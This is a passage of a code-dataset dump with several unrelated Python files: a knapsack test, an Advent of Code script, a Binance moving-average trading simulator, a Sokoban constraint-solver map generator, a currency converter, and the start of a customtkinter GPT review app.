None)\n assert_equal(knapsack.fill_knapsack(0, 0), 0)\n items = []\n items.append(Item(label='a', value=2, weight=2))\n items.append(Item(label='b', value=4, weight=2))\n items.append(Item(label='c', value=6, weight=4))\n items.append(Item(label='d', value=9, weight=5))\n total_weight = 8\n expected_value = 13\n results = knapsack.fill_knapsack(items, total_weight)\n assert_equal(results[0].label, 'd')\n assert_equal(results[1].label, 'b')\n total_value = 0\n for item in results:\n total_value += item.value\n assert_equal(total_value, expected_value)\n print('Success: test_knapsack_bottom_up')\n\n def test_knapsack_top_down(self):\n knapsack = KnapsackTopDown()\n assert_raises(TypeError, knapsack.fill_knapsack, None, None)\n assert_equal(knapsack.fill_knapsack(0, 0), 0)\n items = []\n items.append(Item(label='a', value=2, weight=2))\n items.append(Item(label='b', value=4, weight=2))\n items.append(Item(label='c', value=6, weight=4))\n items.append(Item(label='d', value=9, weight=5))\n total_weight = 8\n expected_value = 13\n assert_equal(knapsack.fill_knapsack(items, total_weight), expected_value)\n print('Success: test_knapsack_top_down')\n\ndef main():\n test = TestKnapsack()\n test.test_knapsack_bottom_up()\n test.test_knapsack_top_down()\n\n\nif __name__ == '__main__':\n main()","repo_name":"Moado/Interactive-Coding-Challenges-","sub_path":"recursion_dynamic/knapsack_01/test_knapsack.py","file_name":"test_knapsack.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"9889681332","text":"#!/usr/bin/env python\nimport os\nfrom pathlib import Path\n\nparent = Path(__file__).resolve().parent\nintputFile = os.path.join(parent, 'Input.txt')\nfile = open(intputFile)\n\nnumbers = file.readlines()\ncounter = 0\nincreasedCounter = 0\ndecreasedCounter = 0\n\nfor number in numbers:\n # check for second index\n inumber = int(number)\n if counter > 0:\n # compare to previous number\n if inumber > 
previous:\n increasedCounter += 1\n else:\n decreasedCounter += 1\n\n previous = inumber\n counter += 1\n\nprint('Increased ', increasedCounter, ' times')\nprint('Decreased ', decreasedCounter, ' times')\nprint('Counter ', counter)\n","repo_name":"jcwalker/AdventOfCode","sub_path":"2021/Day1/Day1.py","file_name":"Day1.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28825594704","text":"import BinanceRestLib\n\nimport json\nimport time\nimport math\nfrom datetime import datetime\nfrom collections import deque\n\ndef getHistoryCandle(symbol, interval, count, time_offset):\n param = {}\n param['symbol'] = symbol\n param['interval'] = interval\n param['limit'] = count\n\n # # calculate the begin time of the requried candle history\n # if interval == '1m':\n # startTime = int((time.time() - 60*count)*1000)\n # elif interval == '5m':\n # startTime = int((time.time() - 300*count)*1000)\n # else:\n # print(\"Not defined interval!!!!\")\n\n # param['startTime'] = startTime + time_offset\n\n # call rest full API to get the history data\n response = BinanceRestLib.getService('klines', param)\n return response\n\ndef saveHistoryCandle(symbol, interval, count):\n time_offset = BinanceRestLib.getServerTimeOffset()\n response = getHistoryCandle(symbol,interval,count,time_offset)\n file_out = open('C:/Users/Cibobo/Documents/Coins/Python/MA/ExampleCandles.txt', 'w+')\n json.dump(response,file_out)\n file_out.close()\n \ndef calculateSMA(data, interval):\n data_len = len(data)\n # e.g for data_len = 10, interval = 7, only 10-7+1=4 SMA value can be calculated\n SMA = []\n # calculate the first value with data [0] to [interval-1] \n current_value = sum(data[:interval])/interval\n SMA.append(current_value)\n # calculate the rest with the update formel from interval to data_len-1\n for i in range(interval, data_len):\n # minus the oldest average value\n current_value -= data[i-interval]/interval\n # add the newest average value\n current_value += data[i]/interval\n # save the value to result array\n SMA.append(current_value)\n\n return SMA \n\ndef gradientChcck(a, b, threadhold):\n if (b-a)/a > threadhold:\n return True\n else:\n return False\n \n# convert candle data from 1 min cyclic to N min\ndef dataConvert1mToNm(data, N):\n convertData = []\n data_length = int(len(data)/N)*N\n print(data_length)\n for i in range(0, data_length, N):\n # init temp with first data element\n temp = data[i]\n for j in range(1,N):\n # get highest as high\n if data[i+j][2] > temp[2]:\n temp[2] = data[i+j][2]\n # get lowest as low\n if data[i+j][3] < temp[3]:\n temp[3] = data[i+j][3]\n # add volumn\n temp[5] += data[i+j][5]\n # add other infors from position 7~11\n temp[7:12] = [sum(x) for x in zip(temp[7:12], data[i+j][7:12])]\n \n # set close price and close time from last element in N min\n temp[4] = data[i+N-1][4]\n temp[6] = data[i+N-1][6]\n\n # set the current price also fromt the lase minute\n temp[12] = data[i+N-1][12]\n\n # add the converted data into list\n convertData.append(temp)\n \n return convertData\n \n\nclass MovingAverage(object):\n # maximum length of MA queue\n max_MA_len = 10\n # fixed candle interval\n #TODO: use other time interval instead the fixed 1m\n candle_interval = '1m'\n\n # gradient threashold for the MA long\n grad_MA_long_threadhold = 0\n\n # Test coins\n symbol_vol = 0\n coin_vol = 0.1\n\n # Diff factor\n diff_factor = 0.00013\n # Stop loss factor\n loss_factor = 1\n\n def __init__(self, 
symbol, long_interval, short_interval, isTest, data_index=4):\n self.symbol = symbol\n self.long_interval = long_interval\n self.short_interval = short_interval\n # data index define which price should be used for MA:\n # 1.open, 2.high, 3.low, 4.close\n self.data_index = data_index\n\n # queue to save the history MA data\n self.MA_long = deque([0]*self.max_MA_len)\n self.MA_short = deque([0]*self.max_MA_len)\n\n # data queue to save the history candle data, the length equal to the interval\n self.MA_long_data = deque([0]*self.long_interval)\n self.MA_short_data = deque([0]*self.short_interval)\n\n # get exchange info for the trading limit\n # self.getExchangeInfo()\n # print(\"Min Price is: \", self.minPrice, \" \\nMin Quantity is: \", self.minQty)\n\n # trading volumn is used to get the real buy/sell price\n self.trading_vol = {'buy':0,'sell':0}\n self.initTradingVolumn()\n print(self.trading_vol)\n\n # get the time offset to the server\n self.time_offset = BinanceRestLib.getServerTimeOffset()\n\n # parameter to save the current trading state\n self.state = 'INIT'\n\n if isTest:\n self.initTestData()\n else:\n # calculate the first SMA data to start the trading\n # self.initSMA()\n self.initEMA()\n # Save trading data for further test\n self.initSaveTestData()\n\n # Delta used to increase the long EMA value, in order to trigger a new buy change after stop loss\n self.delta = 0\n\n # init log file\n file_out = open('TradingInfo.log','a')\n file_out.write(str(datetime.now())+'\\n')\n file_out.close()\n\n # save the current timestamp to keep 1 min cyclic\n self.last_timestamp = time.time()\n\n def initRawData(self, need_limit):\n # call API to get the raw data\n raw_data = getHistoryCandle(self.symbol, self.candle_interval, need_limit, self.time_offset)\n # get out only the needed index\n self.data = []\n for i in range(len(raw_data)):\n self.data.append(float(raw_data[i][self.data_index]))\n\n print(self.data)\n\n def initTradingVolumn(self):\n # get the current price with the init trading volumn\n price = BinanceRestLib.getCurrentPriceTicker(self.symbol[:-3], self.symbol[-3:])\n # calculate the needed trading volumn\n self.trading_vol['buy'] = self.coin_vol/price\n self.trading_vol['sell'] = self.coin_vol/price\n\n def getExchangeInfo(self):\n exchangeInfo = BinanceRestLib.getExchangeInfo()\n # update exchange info in local\n # file_out = open('C:/Users/Cibobo/Documents/Coins/Python/ExchangeInfo.txt','w+')\n # json.dump(exchangeInfo, file_out)\n # file_out.close()\n\n # get exchange info \n # get all filters for the target trading symbol\n filters = next(item for item in exchangeInfo['symbols'] if item['symbol'] == str(self.symbol))['filters']\n \n # minimum trading volumn unit\n self.minQty = float(filters[1]['stepSize'])\n \n # minimum trading price unit\n self.minPrice = float(filters[0]['tickSize'])\n\n # calculate the precise\n self.price_precise = int(-math.log10(self.minPrice))\n\n def initSMA(self):\n # calculate how much history data are needed at the beginning\n need_limit = self.max_MA_len + self.long_interval - 1\n # # get the history raw data from server\n self.initRawData(need_limit)\n\n # ----------------- hanlding of SAM Long -------------------------\n # calculate the first SMA in SMA_long\n SMA_long_0 = sum(self.data[:self.long_interval])/self.long_interval\n # add this value into the queue and pop the left default value\n self.MA_long.popleft()\n self.MA_long.append(SMA_long_0)\n # add also the raw data into history candle data queue for the future calculation\n 
self.MA_long_data = deque(self.data[:self.long_interval])\n\n # ----------------- hanlding of SAM Short ------------------------\n # calculate the first SMA in SMA_long\n SMA_short_0 = sum(self.data[(self.long_interval-self.short_interval):self.long_interval])/self.short_interval\n # add this value into the queue and pop the left default value\n self.MA_short.popleft()\n self.MA_short.append(SMA_short_0)\n # add also the raw data into history candle data queue for the future calculation\n self.MA_short_data = deque(self.data[(self.long_interval-self.short_interval):self.long_interval])\n\n\n # calculate the rest of the SMA with iterator algorithm\n for i in range(1,self.max_MA_len):\n # the new raw data\n new_data = self.data[self.long_interval+i-1]\n\n self.updateSMA(self.MA_long, self.MA_long_data, self.long_interval, new_data)\n self.updateSMA(self.MA_short, self.MA_short_data, self.short_interval, new_data)\n\n print(i,\" th itegration is completed\")\n print(self.MA_long)\n print(self.MA_long_data)\n print(\"Short SMA\")\n print(self.MA_short)\n print(self.MA_short_data)\n\n def updateSMA(self, SMA, SMA_data, interval, new_data):\n # the last SMA value\n temp = SMA[-1]\n\n # pop the oldes history data and add the new one\n old_data = SMA_data.popleft()\n SMA_data.append(new_data)\n\n # minus the fisrt average value and add the new one\n temp -= old_data/interval\n temp += new_data/interval\n\n # add the new calculated SMA into the queue and remove the oldest one\n SMA.popleft()\n SMA.append(temp)\n\n def initEMA(self):\n # calculate how much history data are needed at the beginning\n # the needed data set is calculated by expierent factor k=3.45\n need_limit = self.max_MA_len + math.ceil((self.long_interval+1)*3.45) - 1\n # get the history raw data from server\n self.initRawData(need_limit)\n\n # calculate the alpha\n self.alpha_long = 2/(self.long_interval+1)\n self.alpha_short = 2/(self.short_interval+1)\n print(\"Long alpha: \", self.alpha_long, \" | Short alpha: \", self.alpha_short)\n\n # add first data as S_0 into the last position of queue\n self.MA_long[-1] = self.data[0]\n self.MA_short[-1] = self.data[0]\n\n # calculate recusive for all other EMA value\n for i in range(1,need_limit):\n new_data = self.data[i]\n self.updateEMA(self.MA_long, self.alpha_long, new_data)\n # use all data to calulate short EMA, even if not all of them are needed.\n self.updateEMA(self.MA_short, self.alpha_short, new_data)\n\n print(i,\" th itegration is completed\")\n print(self.MA_long)\n print(\"Short SMA\")\n print(self.MA_short)\n\n def updateEMA(self, EMA, alpha, new_data):\n # get the last EMA\n temp = EMA[-1]\n # calculate new EMA value\n temp = alpha*new_data + (1-alpha)*temp\n # add the new calculated SMA into the queue and remove the oldest one\n EMA.popleft()\n EMA.append(temp)\n\n def initTestData(self):\n file_in = open('C:/Users/Cibobo/Documents/Coins/Python/MA/TestData/TestDataAll/TestData_EOSETH_2018_05_03_07_01', 'r+')\n # self.visual_data = json.loads(file_in.read())\n # self.test_data = deque(self.visual_data)\n\n # Test with 5 min candle data\n self.visual_data = dataConvert1mToNm(json.loads(file_in.read()), 1)\n self.test_data = deque(self.visual_data)\n\n file_in.close()\n\n self.alpha_long = 2/(self.long_interval+1)\n self.alpha_short = 2/(self.short_interval+1)\n print(\"Long alpha: \", self.alpha_long, \" | Short alpha: \", self.alpha_short)\n\n need_limit = self.max_MA_len + math.ceil((self.long_interval+1)*3.45) - 1\n first_test_data = self.test_data.popleft()\n 
self.MA_long[-1] = float(first_test_data[self.data_index])\n self.MA_short[-1] = float(first_test_data[self.data_index])\n\n for i in range(1,need_limit):\n new_data = float(self.test_data.popleft()[self.data_index])\n self.updateEMA(self.MA_long, self.alpha_long, new_data)\n # use all data to calulate short EMA, even if not all of them are needed.\n self.updateEMA(self.MA_short, self.alpha_short, new_data)\n\n # print(i,\" th itegration is completed\")\n # print(self.MA_long)\n # print(\"Short SMA\")\n # print(self.MA_short)\n\n # Data Array for Visulaization\n self.buy_timestamp = []\n self.buy_price = []\n self.sell_timestamp = []\n self.sell_price = []\n\n def checkState(self, state):\n # define state maschine for the MA state change\n # init\n # |\n # -<-- wait* --<-\n # | |\n # buy <------> sell\n # | |\n # ->-- hold* -->-\n if state == 'INIT':\n if self.MA_short[-1] <= self.MA_long[-1]:\n return 'WAIT'\n else:\n return 'INIT'\n \n if state == 'WAIT':\n if self.isBuyChance():\n return 'BUY'\n else:\n return 'WAIT'\n\n if state == 'BUY':\n if self.isSellChance():\n return 'SELL'\n else:\n return 'HOLD'\n\n if state == 'HOLD':\n if self.isSellChance():\n return 'SELL'\n else:\n return 'HOLD'\n \n if state == 'SELL':\n if self.isBuyChance():\n return 'BUY'\n else:\n return 'WAIT'\n\n def isBuyChance(self):\n # Checking Rule 1: \n # a. MA short through MA long from below; \n # b. MA long is moving up\n # if self.MA_short[-1] - self.MA_long[-1] > self.diff_factor*self.MA_long[-1] and \\\n # (self.MA_short[-2] - self.MA_long[-2] < 0 or self.MA_short[-3] - self.MA_long[-3] < 0) and \\\n # gradientChcck(self.MA_long[-2], self.MA_long[-1], self.grad_MA_long_threadhold): \n # print(self.MA_short[-1] - self.MA_long[-1], end=\" | \")\n # print((self.MA_long[-1]-self.MA_long[-2])/self.MA_long[-2], end=\" | \")\n\n # Checking Rule 1 with delta: \n # a. MA short through MA long from below; \n # b. MA long is moving up\n # if self.MA_short[-1] - (self.MA_long[-1]+self.delta) > self.diff_factor*(self.MA_long[-1]+self.delta) and \\\n # (self.MA_short[-2] - (self.MA_long[-2]+self.delta) < 0 or self.MA_short[-3] - (self.MA_long[-3]+self.delta) < 0) and \\\n # gradientChcck(self.MA_long[-2], self.MA_long[-1], self.grad_MA_long_threadhold): \n # print(self.MA_short[-1] - self.MA_long[-1], end=\" | \")\n # print((self.MA_long[-1]-self.MA_long[-2])/self.MA_long[-2], end=\" | \")\n\n # Checking Rule 2: \n # a. MA short will be through MA long from below acoording to a precondition with Linear Spline Interpolation\n # b. MA long is moving up\n # MA_long_pre = 2*self.MA_long[-1] - self.MA_long[-2]\n # MA_short_pre = 2*self.MA_short[-1] - self.MA_short[-2]\n # if MA_short_pre - MA_long_pre >= 1.0e-08 and \\\n # gradientChcck(self.MA_long[-2], self.MA_long[-1], self.grad_MA_long_threadhold):\n # print(MA_short_pre - MA_long_pre, end=\" | \")\n # print((self.MA_long[-1]-self.MA_long[-2])/self.MA_long[-2], end=\" | \") \n \n # Checking Rule 3:\n # a. MA short through MA long from below at t1; \n # b. MA long is moving up at t1;\n # c. 
MA short is moving up at t1+1\n if self.MA_short[-2] - self.MA_long[-2] > self.diff_factor*self.MA_long[-2] and \\\n self.MA_short[-3] - self.MA_long[-3] < 0 and \\\n gradientChcck(self.MA_long[-3], self.MA_long[-2], self.grad_MA_long_threadhold) and \\\n self.MA_short[-1]>self.MA_short[-2]: \n print(self.MA_short[-2] - self.MA_long[-2], end=\" | \")\n print((self.MA_long[-2]-self.MA_long[-3])/self.MA_long[-3], end=\" | \")\n\n return True\n else:\n return False\n\n def isSellChance(self):\n # Checking Rule 1: if MA short is going done through the MA long from above\n if self.MA_short[-1] < self.MA_long[-1]:\n\n # Checking Rule 2: if MA short is begin to going down\n # if self.MA_short[-1] - self.MA_short[-2] < 0:\n\n # Checking Rule 3: MA short will be through MA long from above acoording to a precondition with Linear Spline Interpolation\n # MA_long_pre = 2*self.MA_long[-1] - self.MA_long[-2]\n # MA_short_pre = 2*self.MA_short[-1] - self.MA_short[-2]\n # if MA_short_pre <= MA_long_pre:\n return True\n else:\n return False\n\n def MATrading(self):\n # calculate how much time should be waiting for\n time_diff = time.time() - self.last_timestamp\n # wait for the next candle cyclic\n time.sleep(60-time_diff)\n\n # get the current candle date\n response = getHistoryCandle(self.symbol, self.candle_interval, 1, self.time_offset)\n print(response)\n\n new_data = float(response[0][self.data_index])\n # update MA array and Data array\n # self.updateSMA(self.MA_long, self.MA_long_data, self.long_interval, new_data)\n # self.updateSMA(self.MA_short, self.MA_short_data, self.short_interval, new_data)\n\n self.updateEMA(self.MA_long, self.alpha_long, new_data)\n self.updateEMA(self.MA_short, self.alpha_short, new_data)\n\n print(\"Itegration at time: \", datetime.fromtimestamp(int(response[0][0]/1000)))\n # print(self.MA_long)\n # print(self.MA_long_data)\n # print(\"Short MA\")\n # print(self.MA_short)\n # print(self.MA_short_data)\n\n # update trading state\n new_state = self.checkState(self.state)\n print(\"Current State is: \", new_state)\n\n # get current price\n price = BinanceRestLib.getCurrentPrice(self.symbol[:-3], self.symbol[-3:], self.trading_vol)\n print(\"Current Price is: \", price)\n \n if new_state == 'BUY':\n # # get current price\n # price = BinanceRestLib.getCurrentPrice(self.symbol[:-3], self.symbol[-3:], self.trading_vol)\n # Simulate buy\n self.symbol_vol = self.coin_vol/price['asks_vol']\n self.coin_vol = 0\n self.buy_price = price['asks_vol']\n print(\"Buy with price: \", price['asks_vol'], \"@ \", datetime.now())\n print(\"Calculate balance is %s: %f | %s: %f\" %(self.symbol[:-3], self.symbol_vol, self.symbol[-3:], self.coin_vol))\n \n # file_out_info = str(datetime.fromtimestamp(int(response[0][0]/1000)))\n # file_out_info = file_out_info + \" Buy with price: \" + str(price['asks_vol']) + \"\\n\"\n # file_out_info = file_out_info + \"Calculate balance is: Symbol: \" + str(self.symbol_vol) + \" | Coin : \" + str(self.coin_vol) + \"\\n\"\n # file_out_info = file_out_info + \"Last MA long value is: \" + str(self.MA_long[-2]) + \" | AM short value is: \" + str(self.MA_short[-2]) + \"\\n\"\n # file_out_info = file_out_info + \"Current MA long value is: \" + str(self.MA_long[-1]) + \" | AM short value is: \" + str(self.MA_short[-1]) + \"\\n\"\n self.writeLog(time.time(), price, \"Buy\")\n\n if new_state == 'SELL':\n # # get current price\n # price = BinanceRestLib.getCurrentPrice(self.symbol[:-3], self.symbol[-3:], self.trading_vol)\n # Simulate buy\n self.coin_vol = 
self.symbol_vol*price['bids_vol']\n self.symbol_vol = 0\n print(\"Sell with price: \", price['bids_vol'], \"@ \", datetime.now())\n print(\"Calculate balance is %s: %f | %s: %f\" %(self.symbol[:-3], self.symbol_vol, self.symbol[-3:], self.coin_vol))\n\n # file_out_info = str(datetime.now())\n # file_out_info = file_out_info + \"Sell with price: \" + str(price['bids_vol']) + \"\\n\"\n # file_out_info = file_out_info + \"Calculate balance is: Symbol: \" + str(self.symbol_vol) + \" | Coin : \" + str(self.coin_vol) + \"\\n\"\n # file_out_info = file_out_info + \"Last MA long value is: \" + str(self.MA_long[-2]) + \" | AM short value is: \" + str(self.MA_short[-2]) + \"\\n\"\n # file_out_info = file_out_info + \"Current MA long value is: \" + str(self.MA_long[-1]) + \" | AM short value is: \" + str(self.MA_short[-1]) + \"\\n\"\n self.writeLog(time.time(), price, \"Sell\")\n\n # if new_state == 'HOLD':\n # # create a stop loss condition if it is needed\n # # if the current price is less than the last buy price\n # if float(price['asks_vol']) < self.buy_price*self.loss_factor:\n # print(\"Special cast: stop loss--------------------\")\n # self.coin_vol = self.symbol_vol*float(price['bids_vol'])\n # self.symbol_vol = 0\n # new_state = 'SELL'\n\n # print(\"Sell with price: \", price['bids_vol'], \"@ \", datetime.now())\n # print(\"Calculate balance is %s: %f | %s: %f\" %(self.symbol[:-3], self.symbol_vol, self.symbol[-3:], self.coin_vol))\n # self.writeLog(time.time(), price, \"Sell\")\n\n self.state = new_state\n\n # save all these data to local test\n test_data = response[0]\n test_data.append(price)\n self.saveTestData(test_data)\n\n\n # save the timestamp after all operations are executed\n self.last_timestamp = time.time()\n\n def MATradingTest(self):\n current_test_data = self.test_data.popleft()\n new_data = float(current_test_data[self.data_index])\n # update MA array and Data array\n # self.updateSMA(self.MA_long, self.MA_long_data, self.long_interval, new_data)\n # self.updateSMA(self.MA_short, self.MA_short_data, self.short_interval, new_data)\n\n self.updateEMA(self.MA_long, self.alpha_long, new_data)\n self.updateEMA(self.MA_short, self.alpha_short, new_data)\n\n # print(\"Itegration at time: \", datetime.fromtimestamp(int(current_test_data[0]/1000)))\n # print(self.MA_long)\n # print(\"Short MA\")\n # print(self.MA_short)\n\n new_state = self.checkState(self.state)\n # print(\"Current State is: \", new_state)\n\n price = current_test_data[12]\n if new_state == 'BUY':\n # Simulate buy\n self.symbol_vol = self.coin_vol/float(price['asks_vol'])\n self.coin_vol = 0\n # print(\"Buy with price: \", price['asks_vol'], \"@ \", datetime.now())\n # print(\"Calculate balance is %s: %f | %s: %f\" %(self.symbol[:-3], self.symbol_vol, self.symbol[-3:], self.coin_vol))\n \n self.writeLog(int(current_test_data[0]/1000), price, \"Buy\")\n # print(\"Buy @\", int(current_test_data[0]/1000), \"with price: \", price['asks_vol'])\n \n # save trading info for visualization\n self.buy_timestamp.append(int(current_test_data[0]/1000))\n self.buy_price.append(float(price['asks_vol']))\n print(price['asks_vol'], end=\" | \")\n print(price['asks_vol']-self.MA_long[-1], end=\" | \")\n\n\n if new_state == 'SELL':\n # Simulate Sell\n self.coin_vol = self.symbol_vol*float(price['bids_vol'])\n self.symbol_vol = 0\n # print(\"Sell with price: \", price['bids_vol'], \"@ \", datetime.now())\n # print(\"Calculate balance is %s: %f | %s: %f\" %(self.symbol[:-3], self.symbol_vol, self.symbol[-3:], self.coin_vol))\n\n 
self.writeLog(int(current_test_data[0]/1000), price, \"Sell\")\n # print(\"Sell @\", int(current_test_data[0]/1000), \"with price: \", price['bids_vol'])\n\n # save trading info for visualization\n self.sell_timestamp.append(int(current_test_data[0]/1000))\n self.sell_price.append(float(price['bids_vol']))\n # print(\"Price diff: \", float(price['bids_vol'])-self.buy_price[-1])\n print(float(price['bids_vol'])-self.buy_price[-1])\n print()\n\n # if new_state == 'HOLD':\n # # create a stop loss condition if it is needed\n # # if the current price is less than the last buy price\n # if float(price['asks_vol']) < self.buy_price[-1]*self.loss_factor:\n # print(\"Special cast: stop loss\")\n # self.coin_vol = self.symbol_vol*float(price['bids_vol'])\n # self.symbol_vol = 0\n # self.writeLog(int(current_test_data[0]/1000), price, \"Sell\")\n # self.sell_timestamp.append(int(current_test_data[0]/1000))\n # self.sell_price.append(float(price['bids_vol']))\n # new_state = 'SELL'\n # set delta value\n # self.delta = self.MA_short[-1] - self.MA_long[-1]\n # print(\"Current delta: \", self.delta)\n \n\n self.state = new_state\n\n def writeLog(self, timestamp, price, trading_type):\n file_out = open('TradingInfo.log','a')\n file_out.write(str(datetime.fromtimestamp(timestamp)))\n\n if trading_type == \"Buy\":\n file_out.write(\" Buy with price: \" + str(price['asks_vol']) + \"\\n\")\n else:\n file_out.write(\" Sell with price: \" + str(price['bids_vol']) + \"\\n\")\n\n file_out.write(\"Calculate balance is: Symbol: \" + str(self.symbol_vol) + \" | Coin : \" + str(self.coin_vol) + \"\\n\")\n file_out.write(\"Last MA long value is: \" + str(self.MA_long[-2]) + \" | AM short value is: \" + str(self.MA_short[-2]) + \"\\n\")\n file_out.write(\"Current MA long value is: \" + str(self.MA_long[-1]) + \" | AM short value is: \" + str(self.MA_short[-1]) + \"\\n\")\n file_out.write(\"\\n\")\n file_out.close()\n\n # Save trading data for further test\n def initSaveTestData(self):\n self.test_data_save_name = \"TestData_\" + self.symbol + \"_\" + datetime.now().strftime(\"%Y_%m_%d_%H_%M\") \n test_file = open(self.test_data_save_name, 'a')\n test_file.write(\"[\")\n test_file.close()\n self.test_data_save_begin = time.time()\n\n def saveTestData(self, test_data):\n test_file = open(self.test_data_save_name, 'a')\n \n # create a new log file in every 24 Hour\n if time.time() - self.test_data_save_begin > 86400:\n # add the last data into the old file and close it \n test_file.write(str(test_data))\n test_file.write(\"]\")\n test_file.close()\n # create a new log\n self.initSaveTestData()\n else:\n test_file.write(str(test_data))\n test_file.write(\", \")\n test_file.close()\n \n\n\nisTest = False\ntest = MovingAverage('BNBETH',54,15,isTest)\n\nwhile True:\n test.MATrading()\n\n# while len(test.test_data)>0:\n# test.MATradingTest()\n\nprint(test.symbol_vol)\nprint(test.coin_vol)\n\n\n\n","repo_name":"cibobo/MovingAverage","sub_path":"MovingAverage.py","file_name":"MovingAverage.py","file_ext":"py","file_size_in_byte":26604,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"25946081434","text":"from itertools import combinations\nfrom simpleai.search import CspProblem, backtrack, MOST_CONSTRAINED_VARIABLE, LEAST_CONSTRAINING_VALUE, HIGHEST_DEGREE_VARIABLE\n\ndef armar_mapa(filas, columnas, cantidad_paredes, cantidad_cajas_objetivos):\n\n paredes = []\n cajas = []\n objetivos = []\n esquinas = [(0,0),(filas-1,0),(0,columnas-1),(filas-1,columnas-1)]\n\n for 
pared in range(cantidad_paredes):\n paredes.append('pared'+str(pared))\n\n for caja_objetivo in range(cantidad_cajas_objetivos):\n cajas.append('caja'+str(caja_objetivo))\n objetivos.append('obj'+str(caja_objetivo))\n\n variables = ['Jugador'] + cajas + objetivos + paredes\n print(variables)\n #/////////////////////////////////////////////////////////////////\n dominios = {}\n\n for var in variables:\n dominio_var = []\n for fila in range(filas):\n for col in range(columnas): \n if var in cajas:\n if (fila,col) not in esquinas:\n dominio_var.append((fila,col))\n else:\n dominio_var.append((fila,col))\n dominios[var] = dominio_var\n\n #print(dominios)\n #//////////////////////////////////////////////////////////////////\n\n restricciones = []\n\n def distinta_posicion(variables,values):\n pos_obj1, pos_obj2 = values\n return pos_obj1 != pos_obj2\n\n for obj1, obj2 in combinations([\"Jugador\"]+paredes+cajas,2):\n restricciones.append(((obj1,obj2),distinta_posicion))\n\n def distinta_posicion_paredobjetivo(variables,values):\n pos_pared, pos_objetivo = values\n return pos_pared != pos_objetivo\n\n for pared, objetivo in combinations(paredes+objetivos,2):\n restricciones.append(((pared,objetivo),distinta_posicion_paredobjetivo))\n\n def distinta_posicion_objetivo(variables,values):\n pos_pared, pos_objetivo = values\n return pos_pared != pos_objetivo\n\n for v1, v2 in combinations(objetivos,2):\n restricciones.append(((v1,v2), distinta_posicion_objetivo))\n\n def caja_contra_pared(posicion):\n return posicion[0] == 0 or posicion[0] == filas-1 or posicion[1] == 0 or posicion[1] == columnas-1\n\n def hasta_una_pared_adyacente (variables, values):\n caja , *paredes = values\n print(\"CAJA\",caja)\n print(\"PAREDES\",paredes)\n \n cantidad_paredes_adyacentes = 0\n\n if caja_contra_pared:\n cantidad_paredes_adyacentes += 1\n\n posiciones_adyacentes = [(caja[0]+1,caja[1]),(caja[0]-1,caja[1]),(caja[0],caja[1]+1),(caja[0],caja[1]-1)]\n for adyacente in posiciones_adyacentes:\n for pared in paredes: \n if pared == adyacente:\n cantidad_paredes_adyacentes += 1\n print(cantidad_paredes_adyacentes)\n return cantidad_paredes_adyacentes < 2\n\n\n for caja in cajas:\n if len(paredes) > 1:\n for pared1, pared2 in combinations(paredes,2):\n restricciones.append(((caja,pared1,pared2), hasta_una_pared_adyacente))\n else:\n restricciones.append((([caja]+paredes), hasta_una_pared_adyacente))\n\n\n socobanProblem = CspProblem(variables, dominios, restricciones)\n\n solucion = backtrack(\n socobanProblem,\n inference=False,\n variable_heuristic=MOST_CONSTRAINED_VARIABLE,\n value_heuristic=LEAST_CONSTRAINING_VALUE,\n )\n\n resultado_paredes = []\n for pared in paredes:\n resultado_paredes.append(solucion[pared])\n\n resultado_objetivos = []\n for objetivo in objetivos:\n resultado_objetivos.append(solucion[objetivo])\n\n resultado_cajas = []\n for caja in cajas:\n resultado_cajas.append(solucion[caja])\n\n\n print(solucion)\n return (resultado_paredes, resultado_cajas, resultado_objetivos, solucion['Jugador'])\n\nif __name__ == \"__main__\":\n mapa_resultante = armar_mapa(5,5,4,2)\n print(mapa_resultante)","repo_name":"nikoevi87/TP_IA_2020_Dominguez_Marzioni_Rossa","sub_path":"entrega2.py","file_name":"entrega2.py","file_ext":"py","file_size_in_byte":3928,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25599450662","text":"import requests\n\ndef convert_gbp_to_usd(amount):\n response = requests.get('https://api.exchangerate-api.com/v4/latest/GBP')\n 
exchange_rates = response.json()['rates']\n usd_rate = exchange_rates['USD']\n usd_amount = amount * usd_rate\n\n return usd_amount\n\n\npounds = int(input('Enter an amount of pounds: '))\nus_dollars = convert_gbp_to_usd(pounds)\nprint(f'{pounds:.2f} GPB is equivalent to {us_dollars:.2f} USD')\n","repo_name":"zahariev-webbersof/python-fundamentals-05-2023","sub_path":"data_types_and_variables/pounds_to_dollars.py","file_name":"pounds_to_dollars.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"48"} +{"seq_id":"16698463992","text":"import os\nimport openai\nimport tkinter as tk\nimport tkinter.ttk as ttk\nimport customtkinter as ctk\nfrom PIL import Image\n\nfrom gpt_reviewer import Analyzer, Review, Scoring\n\nctk.set_appearance_mode(\"System\")\nctk.set_default_color_theme(\"blue\")\n\nheader_label_color = \"#327ab3\"\nheader_font_color = \"#DCE4EE\"\ncontainer_background_color = \"#f0f0f0\"\n\nclass Reviewer(ctk.CTk):\n def __init__(self):\n openai.api_key = os.environ.get(\"OPENAI_API_KEY\")\n\n self.analyzer = Analyzer()\n\n self.hygiene_score = 0\n self.food_score = 0\n self.reception_score = 0\n self.bar_score = 0\n self.other_comments_score = 0\n\n self.create_tk()\n\n def create_tk(self):\n super().__init__()\n\n self.title(\"GPT Reviewer\")\n self.geometry(\"800x1000\")\n\n self.create_frames()\n self.create_widgets()\n\n def create_frames(self):\n self.grid_columnconfigure(0, weight=1)\n self.grid_rowconfigure(0, weight=0) # Scoring Frame\n self.grid_rowconfigure(1, weight=8) # Review Frame\n self.grid_rowconfigure(2, weight=1) # Submit Frame\n\n # Scoring Frame\n self.tk_scoring_frame = ctk.CTkFrame(self, corner_radius=0)\n self.tk_scoring_frame.grid(row=0, column=0, sticky=\"nsew\")\n\n # 10 Columns, 2 for each score (Hygiene, Food, Reception, Bar, Other Comments)\n self.tk_scoring_frame.grid_columnconfigure(0, weight=0)\n self.tk_scoring_frame.grid_columnconfigure(1, weight=1)\n self.tk_scoring_frame.grid_columnconfigure(2, weight=0)\n self.tk_scoring_frame.grid_columnconfigure(3, 